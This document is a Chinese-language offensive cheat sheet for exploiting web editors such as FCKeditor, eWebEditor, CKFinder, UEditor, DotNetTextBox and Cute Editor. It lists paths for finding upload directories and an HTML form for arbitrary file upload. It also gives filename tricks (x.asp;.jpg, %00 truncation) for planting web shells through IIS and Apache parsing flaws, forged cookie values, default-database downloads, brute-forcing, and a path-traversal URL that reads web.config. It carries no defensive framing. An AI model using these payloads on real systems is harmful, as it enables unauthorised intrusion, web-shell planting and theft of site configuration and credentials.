編輯器利用
查找編輯器目錄
- 目錄掃描
- 目錄周遊
- 蜘蛛爬行
漏洞利用
- 百度相關編輯器漏洞利用
FCKeditor編輯器頁/檢視編輯器版本/檢視檔案上傳路徑
- FCKeditor編輯器頁
- FCKeditor/_samples/default.html
- 檢視編輯器版本
- FCKeditor/_whatsnew.html
- 檢視檔案上傳路徑
- fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
檢視上傳目錄
- XML頁面中第二行"url=/xxx"的部分就是預設基準上傳路徑
- FCKeditror被動限制政策所導緻的過濾不嚴問題
- 影響版本:FCKeditor x.x <= FCKeditor v2.4.3
脆弱性描述
- FCKeditor v2.4.3中File類别預設拒絕上傳類型
- html |htm| php|php2|php3|php4|php5|phtml|pwml|inc|asp|aspx|ascx|jsp|cfm|cfc|
- pl|bat|exe|com|dll|vbs|js|reg|cgi|htaccess|asis|sh|shtml|shtm|phtm
- Fckeditor 2.0 <=2.2 允許上傳asa、cer、php2、php4、inc、pwnl、pht字尾的檔案
- 上傳後 它儲存的檔案直接用的$sFilePath =$sServerDir.$sFileName,而沒有使用$sExtension為字尾
- 直接導緻在win下在上傳檔案後面加個.來突破
- 而在apache下,因為"Apache檔案名解析缺陷漏洞”也可以利用之
漏洞版本
- windows有任意檔案上傳漏洞如x.asp;.jpg
- Apache+linux環境下在上傳檔案後面加個.突破!測試通過
Version <=2.4.2 For php
在處理PHP在上傳的地方并未對media類型進行進行上傳檔案類型的控制,導緻使用者上傳任意檔案!将以下儲存為html檔案,修改action位址
<form id="fmUpload" enctype="multipart/form-data"
action="http://www.site.com/FCKeditor/editor?filemanage/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
<input type="file" name ="NewFile" size="50"><br>
<input id="btnUpload" type="submit" value="Upload">
</form>
FCKeditor 檔案上傳“.”變“_”下劃線的繞過方法
- 很多時候上傳的檔案例如: shell.php.rar 或者shell.php;.jpg會變為shell_php;.jpg這是新版FCK的變化
- 送出shell.php+空格繞過
- 不過空格隻支援win系統*nix是不支援的[shell.php 和shell.php+空格是2個不同的檔案 未測試
- 繼續上傳同名檔案可變為shell.php;(1).jpg 也可以建立一個檔案夾,隻檢測了第一級的目錄,如果跳到二級目錄就不受限制
突破建立檔案夾
FCKeditor_2.5/editor/filemanager/connectors/asp/connector.aspCommand=Createfolder&Type=Image&Currentfolder=/xx.asp&NewFoldername=x.asp
FCKeditor中test檔案的上傳位址
- FCKeditor/editor/filemanager/browser/default/connectors/test.html
- FCKeditor/editor/filemanager/upload/test.html
- FCKeditor/editor/filemanager/connectors/test.html
- FCKeditor/editor/filemanager/connectors/uploadtest.html
繞過asp;.jpg變asp_jpg
- 使用特殊名稱繞過
- a.aspx.a;.a.aspx.jpg..jpg.aspx
- xx.asp.;.jpg
EWEbeditor
1.進背景
- 通過弱密碼
- 下載下傳預設資料庫 ewebeditor/db/ewebeditor.mdb
- burp抓包爆破
- 利用注入點得到密碼
如果沒有背景
利用目錄周遊漏洞,找網站資料庫位置下載下傳網站資料庫,登入網站背景拿shell
利用exp進行
構造上傳
2.修改上傳類型
3.自己添加上傳樣式以後添加上傳按鈕一一上傳
CKFinder
任意檔案上傳漏洞
- 其1.4.3 asp.net版本存在任意檔案上傳漏洞,攻擊者可以利用該漏洞上傳任意檔案,CKFinder在上傳檔案的時候,強制将檔案名(不包括字尾)中點号等其他字元轉為下劃線_,但是在修改檔案名時卻沒有任何限制,進而導緻可以上傳1_php;1.jpg等畸形檔案名,最終導緻檔案上傳漏洞
- 然後修改檔案名
- 1_php;1.jpg
- 利用iis6.0目錄解析漏洞拿shell
- 建立目錄/x.asp/
- 在目錄下上傳圖檔馬即可拿shell
南方資料編輯器southidceditor
首先登陸背景
利用編輯器上傳
通路admin/southidceditor/admin_style.asp
修改編輯器樣式,增加asa(不要asp).然後直接背景編輯新聞上傳
UEDITOR
- 利用ii6.0檔案名解析漏洞
- 上傳圖檔改名為
- x.php;20221.jpg擷取shell
DotNetTextBox編輯器漏洞
- 關鍵字:system_dntb/
- 确定有system_dntb/uploadimg.aspx并能打開,這時候是不能上傳的,由于他是驗證cookie來得出上傳後的路徑,這樣我們可以用cookie欺騙工具
- cookie:UserType=0;IsEdition=0;Info=1;
- uploadFolder=../system_dntb/Upload/;
- 路徑可以修改,隻要權限夠,上傳後改名為1.asp;.jpg利用iis解析漏洞
PHPWEB網站管理系統背景Kedit編輯器
- 兩種利用方式
- 第一種是利用iis6.0檔案名解析漏洞
- xx.php;xx.jpg
- 第二種方式
- %00截斷
- xx.php%00jpg
Cute Editor 線上編輯器本地包含漏洞
- 影響版本:
- Cute Editor For Net 6.4
- 脆弱描述
- 可以随意檢視網站檔案内容,危害較大
- 攻擊利用
http://www.xx.com/Cute_Client?CuteEditor/Load.ashx?type=image&file=../../../web.config
等等編輯器漏洞,其餘特殊編輯器漏洞,需要時可自行百度查找他們的漏洞